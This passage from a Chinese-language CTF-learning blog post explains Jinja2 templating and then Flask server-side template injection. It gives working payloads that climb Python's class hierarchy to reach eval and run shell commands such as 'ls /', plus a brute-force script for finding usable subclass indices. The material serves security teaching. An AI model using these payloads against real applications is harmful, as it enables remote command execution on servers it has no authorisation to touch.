<ol>
<li><p>Jinja2是一种面向Python的现代和设计友好的模板语言，它是以Django的模板为模型的；Jinja2是<strong>Flask框架的一部分</strong>。Jinja2会把模板参数提供的相应的值替换了  块</p>
<ol>
<li><p>变量<code>&#123;&#123;&#125;&#125;</code></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">p</span>&gt;</span>The value is &#123;&#123; value &#125;&#125;.<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>控制语句<code>&#123;%%&#125;</code></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!--条件语句--&gt;</span></span><br><span class="line">&#123;% if user.is_admin %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">p</span>&gt;</span>Welcome, Admin!<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">&#123;% elif user.is_member %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">p</span>&gt;</span>Welcome, Member!<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">&#123;% else %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">p</span>&gt;</span>Welcome, Guest!<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!--循环语句--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">ul</span>&gt;</span></span><br><span class="line">   &#123;% for item in items %&#125;</span><br><span class="line">       <span class="tag">&lt;<span class="name">li</span>&gt;</span>&#123;&#123; item &#125;&#125;<span class="tag">&lt;/<span class="name">li</span>&gt;</span></span><br><span class="line">   &#123;% endfor %&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">ul</span>&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>宏，类似于函数，也是<code>&#123;%%&#125;</code></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;% macro input(name, value=&#x27;&#x27;, type=&#x27;text&#x27;, size=20) %&#125;</span><br><span class="line">   <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;&#123;&#123; type &#125;&#125;&quot;</span> <span class="attr">name</span>=<span class="string">&quot;&#123;&#123; name &#125;&#125;&quot;</span> <span class="attr">value</span>=<span class="string">&quot;&#123;&#123; value|e &#125;&#125;&quot;</span> <span class="attr">size</span>=<span class="string">&quot;&#123;&#123; size &#125;&#125;&quot;</span>&gt;</span></span><br><span class="line">&#123;% endmacro %&#125;</span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span>&gt;</span></span><br><span class="line">   &#123;&#123; input(&#x27;username&#x27;) &#125;&#125;</span><br><span class="line">   &#123;&#123; input(&#x27;email&#x27;, type=&#x27;email&#x27;) &#125;&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>注释&#96;&#96;，并不会被渲染出来</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;# This is a comment #&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>内置过滤器这里不进行讨论</p>
</li>
</ol>
</li>
<li><p>模板渲染示例</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># jinja2模板使用示例</span></span><br><span class="line"><span class="comment"># 1. 模板文件 template.html，在/templates/目录下</span></span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;&#123;&#123; title &#125;&#125;&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;h1&gt;&#123;&#123; heading &#125;&#125;&lt;/h1&gt;</span><br><span class="line">    &lt;ul&gt;</span><br><span class="line">        &#123;% <span class="keyword">for</span> item <span class="keyword">in</span> items %&#125;</span><br><span class="line">            &lt;li&gt;&#123;&#123; item &#125;&#125;&lt;/li&gt;</span><br><span class="line">        &#123;% endfor %&#125;</span><br><span class="line">    &lt;/ul&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. 文件: template.py</span></span><br><span class="line"><span class="keyword">from</span> jinja2 <span class="keyword">import</span> Environment, FileSystemLoader</span><br><span class="line"></span><br><span class="line"><span class="comment"># 指定模板文件所在的目录</span></span><br><span class="line">file_loader = FileSystemLoader(<span class="string">&#x27;templates&#x27;</span>)</span><br><span class="line"><span class="comment"># 创建环境</span></span><br><span class="line">env = Environment(loader=file_loader)</span><br><span class="line"><span class="comment"># 加载模板</span></span><br><span class="line">template = env.get_template(<span class="string">&#x27;template.html&#x27;</span>)</span><br><span class="line"><span class="comment"># 定义要传递给模板的数据</span></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&#x27;title&#x27;</span>: <span class="string">&#x27;My Page&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;heading&#x27;</span>: <span class="string">&#x27;Welcome to My Page&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;items&#x27;</span>: [<span class="string">&#x27;Item 1&#x27;</span>, <span class="string">&#x27;Item 2&#x27;</span>, <span class="string">&#x27;Item 3&#x27;</span>]</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment"># 渲染模板</span></span><br><span class="line">output = template.render(data)</span><br><span class="line"><span class="comment"># 输出结果</span></span><br><span class="line"><span class="built_in">print</span>(output)</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="ssti漏洞利用"><a href="#ssti漏洞利用" class="headerlink" title="ssti漏洞利用"></a>ssti漏洞利用</h3><h4 id="类型一-基类找模块"><a href="#类型一-基类找模块" class="headerlink" title="类型一: 基类找模块"></a>类型一: 基类找模块</h4><ol>
<li><strong>基本思路</strong><ol>
<li>拿基类 -&gt; 找子类 -&gt; 构造命令执行或者文件读取负载 -&gt; 拿 flag</li>
<li>思想: 获取含有目标方法的模块中的类，然后获取类<code>__globals__</code>来获取目标方法(本质上是要找模块)</li>
</ol>
</li>
<li>下面是一些常用的构造链的示例，接下来的每一部分都会进行解释</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;().__class__.__base__.__subclasses__()[<span class="number">194</span>].__init__.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;ls /&quot;).read()&#x27;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h5 id="获取基类"><a href="#获取基类" class="headerlink" title="获取基类"></a>获取基类</h5><ol>
<li>常用魔术方法<ol>
<li>关于<code>__bases__</code>: <strong>元组</strong>，该属性只存在于类对象中，而不是类的实例对象中，用途：查看类的继承关系，动态修改类的继承关系（<strong>记录类继承关系的</strong>）</li>
</ol>
</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1. 获取基类</span></span><br><span class="line">__class__   <span class="comment"># 类的一个内置属性，表示实例对象的类，其实是获取类对象</span></span><br><span class="line">__base__    <span class="comment"># 类型对象的直接基类</span></span><br><span class="line">__bases__   <span class="comment"># 类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__</span></span><br><span class="line">__mro__  <span class="comment"># 查看继承关系和调用顺序，返回元组。此属性是由类组成的元组，在方法解析期间会基于它来查找基类</span></span><br></pre></td></tr></table></figure>

<h5 id="寻找子类"><a href="#寻找子类" class="headerlink" title="寻找子类"></a>寻找子类</h5><ol>
<li>这里只用到一个重点函数，那就是<code>__subclasses__()</code>，<strong>获取所有子类列表</strong><ol>
<li>该方法只存在于类对象中，而不是类的实例对象中</li>
<li>这部分的重心不在子类本身上，而是在子类是否有 os 或者 file 的相关模块可以被调用上 –&gt; <strong>命令执行</strong>或者<strong>文件读取</strong></li>
</ol>
</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>().__class__.__base__.__subclasses__()</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>().__class__.__bases__[<span class="number">0</span>]__subclasses__()</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>().__class__.__mro__[-<span class="number">1</span>].__subclasses__()</span><br></pre></td></tr></table></figure>

<h5 id="命令执行"><a href="#命令执行" class="headerlink" title="*命令执行"></a>*命令执行</h5><ol>
<li><p>这里使用到的内置函数和原型链污染的利用函数很多类似，这里是粘贴《Python原型链污染》的，详见这部分的内容</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">__globals__ <span class="comment"># 5. 与函数和方法对象相关联，全局信息存在字典里，只读字典</span></span><br><span class="line">   <span class="comment"># ref: https://docs.python.org/3/reference/datamodel.html</span></span><br><span class="line"></span><br><span class="line">__init__ <span class="comment"># 6. 初始化类，返回的类型是function</span></span><br><span class="line">    <span class="comment"># 关于.__init__.__globals__实际上是通过函数访问全局变量而不是初始化实例</span></span><br><span class="line"></span><br><span class="line">__builtins__ <span class="comment"># 7. 内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">__import__</span> <span class="comment"># 8. 内置方法: 动态导入模块</span></span><br><span class="line">     <span class="comment"># 调用示例</span></span><br><span class="line">     odule_name = <span class="string">&#x27;os&#x27;</span></span><br><span class="line">     os_module = <span class="built_in">__import__</span>(module_name)</span><br><span class="line">     <span class="built_in">print</span>(os_module.getcwd())  <span class="comment"># 输出当前工作目录</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>常常用来rce或者读文件的模块<img src="/pic/Flask_ssti/executeClass.png" alt="常常用来rce或者读文件的模块"></p>
<ol>
<li>补充一点思路<ol>
<li><em><strong>别人探索出来的链和模块</strong></em></li>
<li>可以多关注一下内置函数，python有文档详细的进行了记录</li>
</ol>
</li>
<li>详见helloctf<a target="_blank" rel="noopener" href="https://hello-ctf.com/HC_Web/ssti/#_8">hellocf</a></li>
</ol>
</li>
</ol>
<h5 id="自动化查找"><a href="#自动化查找" class="headerlink" title="自动化查找"></a>自动化查找</h5><ol>
<li><p>利用模板语言</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 模板语法 _ 命令执行_eval</span></span><br><span class="line">&#123;% <span class="keyword">for</span> x <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">    &#123;% <span class="keyword">if</span> x.__init__ <span class="keyword">is</span> defined <span class="keyword">and</span> x.__init__.__globals__ <span class="keyword">is</span> defined <span class="keyword">and</span> <span class="string">&#x27;eval&#x27;</span> <span class="keyword">in</span> x.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>].__name__ %&#125;</span><br><span class="line">        &#123;&#123; x.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;ls /&quot;).read()&#x27;</span>) &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>利用python脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 使用 python 脚本 用于寻找序号</span></span><br><span class="line">url = <span class="string">&quot;http://url/level/1&quot;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">find_eval</span>(<span class="params">url</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>):</span><br><span class="line">        data = &#123;</span><br><span class="line">            <span class="string">&#x27;code&#x27;</span>: <span class="string">&quot;&#123;&#123;().__class__.__bases__[0].__subclasses__()[&quot;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;].__init__.__globals__[&#x27;__builtins__&#x27;]&#125;&#125;&quot;</span>,</span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url, data=data, headers=headers)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;eval&#x27;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            <span class="built_in">print</span>(data)</span><br><span class="line">find_eval(url)</span><br></pre></td></tr></table></figure></li>
</ol>
<h4 id="类型二-直接找模块"><a href="#类型二-直接找模块" class="headerlink" title="类型二: 直接找模块"></a>类型二: 直接找模块</h4><h3 id="ssti绕过"><a href="#ssti绕过" class="headerlink" title="ssti绕过"></a>ssti绕过</h3><h2 id="Ref"><a href="#Ref" class="headerlink" title="Ref"></a>Ref</h2><ol>
<li><a target="_blank" rel="noopener" href="https://hello-ctf.com/HC_Web/ssti/">hello_ctf，0基础入门</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/13508538.html">概念入门</a></li>
</ol>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/tags/">Tag</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Python%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text">Python前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8"><span class="toc-number">1.1.</span> <span class="toc-text">.使用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8"><span class="toc-number">1.2.</span> <span class="toc-text">容器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%A1%E5%9D%97%E5%92%8C%E5%8C%85"><span class="toc-number">1.3.</span> <span class="toc-text">模块和包</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F%E5%92%8C%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="toc-number">1.4.</span> <span class="toc-text">*特殊变量和魔术方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%83%E7%B1%BB"><span class="toc-number">1.5.</span> <span class="toc-text">元类</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%98%8E%E7%A1%AE%E7%9B%AE%E6%A0%87"><span class="toc-number">1.5.1.</span> <span class="toc-text">明确目标</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%85%83%E7%B1%BB"><span class="toc-number">1.5.2.</span> <span class="toc-text">什么是元类</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#type%E4%B8%8Eobject"><span class="toc-number">1.5.3.</span> <span class="toc-text">type与object</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Python%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6"><span class="toc-number">1.6.</span> <span class="toc-text">Python访问控制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%A8%A1%E6%9D%BF%EF%BC%9F"><span class="toc-number">2.</span> <span class="toc-text">什么是模板？</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%A1%E6%9D%BF%E5%B7%A5%E4%BD%9C%E6%B5%81"><span class="toc-number">2.1.</span> <span class="toc-text">*模板工作流</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E%E5%8F%8A%E5%85%B6%E5%8F%98%E9%87%8F%E8%AF%AD%E6%B3%95"><span class="toc-number">2.2.</span> <span class="toc-text">常见模板引擎及其变量语法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%B1%BB%E5%9E%8B%E5%88%A4%E6%96%AD%E5%9B%BE%E4%BE%8B"><span class="toc-number">2.3.</span> <span class="toc-text">类型判断图例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Flask-ssti"><span class="toc-number">3.</span> <span class="toc-text">Flask ssti</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">3.1.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Jinja2%E5%9F%BA%E7%A1%80"><span class="toc-number">3.2.</span> <span class="toc-text">Jinja2基础</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssti%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.3.</span> <span class="toc-text">ssti漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%B1%BB%E5%9E%8B%E4%B8%80-%E5%9F%BA%E7%B1%BB%E6%89%BE%E6%A8%A1%E5%9D%97"><span class="toc-number">3.3.1.</span> <span class="toc-text">类型一: 基类找模块</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%9F%BA%E7%B1%BB"><span class="toc-number">3.3.1.1.</span> <span class="toc-text">获取基类</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AF%BB%E6%89%BE%E5%AD%90%E7%B1%BB"><span class="toc-number">3.3.1.2.</span> <span class="toc-text">寻找子类</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">3.3.1.3.</span> <span class="toc-text">*命令执行</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E5%8C%96%E6%9F%A5%E6%89%BE"><span class="toc-number">3.3.1.4.</span> <span class="toc-text">自动化查找</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%B1%BB%E5%9E%8B%E4%BA%8C-%E7%9B%B4%E6%8E%A5%E6%89%BE%E6%A8%A1%E5%9D%97"><span class="toc-number">3.3.2.</span> <span class="toc-text">类型二: 直接找模块</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssti%E7%BB%95%E8%BF%87"><span class="toc-number">3.4.</span> <span class="toc-text">ssti绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ref"><span class="toc-number">4.</span> <span class="toc-text">Ref</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://kc1zs4.github.io/2024/11/11/flask_ssti/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&text=flask_ssti"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&is_video=false&description=flask_ssti"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=flask_ssti&body=Check out this article: https://kc1zs4.github.io/2024/11/11/flask_ssti/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&name=flask_ssti&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://kc1zs4.github.io/2024/11/11/flask_ssti/&t=flask_ssti"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023-2025
    KC1zs4&#39;s Blog
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

  
<script src="/js/search.js"></script>

  <script type="text/javascript">
  $(function() {

    var $inputArea = $("input#search-input");
    var $resultArea = document.querySelector("div#search-result");

    $inputArea.focus(function() {
      var search_path = "search.xml";
      if (search_path.length == 0) {
        search_path = "search.xml";
      }
      var path = "/" + search_path;
      searchFunc(path, 'search-input', 'search-result');
    });

    $inputArea.keydown(function(e) {
      if (e.which == 13) {
        e.preventDefault();
      }
    });

    var observer = new MutationObserver(function(mutationsList, observer) {
      if (mutationsList.length == 1) {
        if (mutationsList[0].addedNodes.length) {
          $(".search-no-result").hide();
        } else if (mutationsList[0].removedNodes.length) {
          $(".search-no-result").show(200);
        }
      }
    });

    observer.observe($resultArea, { childList: true });

  });
  </script>

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'kc1zs4-github-io';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
